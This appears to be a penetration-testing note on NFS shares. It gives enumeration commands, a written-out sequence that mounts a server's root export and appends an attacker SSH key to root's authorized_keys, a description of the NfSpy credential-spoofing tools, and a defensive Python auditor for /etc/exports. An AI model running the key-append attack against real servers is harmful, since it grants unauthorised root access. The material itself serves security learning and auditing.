In default configurations, the remote NFS server will map the UID/GID of the connecting user. For example, if ‘int0x33’ is my local user account, and /etc/passwd and /etc/group have assigned me a uid and gid of 3333, then on connecting to a remote NFS share I’ll have access as that same uid and gid on the remote system, regardless of what username is assigned to it. This includes root.
```
root@box:~# rpcinfo -p 10.10.10.10
# All Mount Points
root@box:~# showmount -a 10.10.10.10
# Export List
root@box:~# showmount -e 10.10.10.10
# Directories
root@box:~# showmount -d 10.10.10.10
# Hosts
root@box:~# showmount 10.10.10.10
```
```
root@box:~# ssh-keygen
root@box:~# mkdir /tmp/r00t
root@box:~# mount -t nfs 10.10.10.10:/ /tmp/r00t/
root@box:~# cat ~/.ssh/id_rsa.pub >> /tmp/r00t/root/.ssh/authorized_keys
root@box:~# umount /tmp/r00t
root@box:~# ssh email@example.com
```
NfSpy is a Python library for automating the falsification of NFS credentials when mounting an NFS share. Included are two client programs:
- nfspy uses the Filesystem in Userspace (FUSE) library to mount an NFS share in Linux. This allows the use of any regular file-searching and manipulation programs like `find` to explore the NFS export.
- nfspysh is a ftp-like interactive shell for exploring NFS exports. It does not require the FUSE library, so it can run on non-Linux platforms.
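From the server side, both the key-append steps and NfSpy's credential falsification depend on how each entry in /etc/exports is written. The following is an added example, not code from the original page or from NfSpy: a small auditor that flags the relevant exports(5) options. The sample file, the finding names and `audit_exports` are constructed for illustration, and the parser assumes one export per line with no continuation lines or quoted paths.

```python
import re

# Constructed sample /etc/exports (illustrative; not from the original page).
SAMPLE_EXPORTS = """\
/            *(rw,no_root_squash)
/srv/share   192.0.2.0/24(rw,sync,root_squash) *(ro,insecure)
/home        client.example.internal(rw,sync,sec=krb5p)
/srv/backup  198.51.100.7   # no options: defaults apply
"""

SPEC_RE = re.compile(r"^([^()]*)(?:\(([^()]*)\))?$")  # host(opt,opt,...)

def audit_exports(text):
    """Return (path, client, finding) tuples, in file order, for risky entries."""
    findings = []
    for raw in text.splitlines():
        fields = raw.split("#", 1)[0].split()
        if len(fields) < 2:
            continue  # blank, comment-only, or no client list
        path, specs = fields[0], fields[1:]
        for spec in specs:
            m = SPEC_RE.match(spec)
            if not m:
                continue  # syntax this sketch does not handle
            client = m.group(1) or "*"  # "(opts)" with no host means any host
            opts = [o for o in (m.group(2) or "").split(",") if o]
            # sec= lists flavors separated by ':'; without it the flavor is sys
            flavors = [f for o in opts if o.startswith("sec=")
                       for f in o[4:].split(":")] or ["sys"]
            checks = [
                ("root_fs", path == "/"),                      # whole filesystem exported
                ("no_root_squash", "no_root_squash" in opts),  # client uid 0 stays root
                ("world_rw", client == "*" and "rw" in opts),  # any host may write
                ("insecure_port", "insecure" in opts),         # unprivileged source ports accepted
                ("auth_sys", "sys" in flavors),                # server trusts client-supplied uid/gid
            ]
            findings += [(path, client, name) for name, hit in checks if hit]
    return findings

if __name__ == "__main__":
    for path, client, name in audit_exports(SAMPLE_EXPORTS):
        print(f"{path:12} {client:20} {name}")
```

Only the `sec=krb5p` export comes back clean: every entry that allows the `sys` flavor accepts whatever uid/gid the client presents, and `no_root_squash` extends that to uid 0.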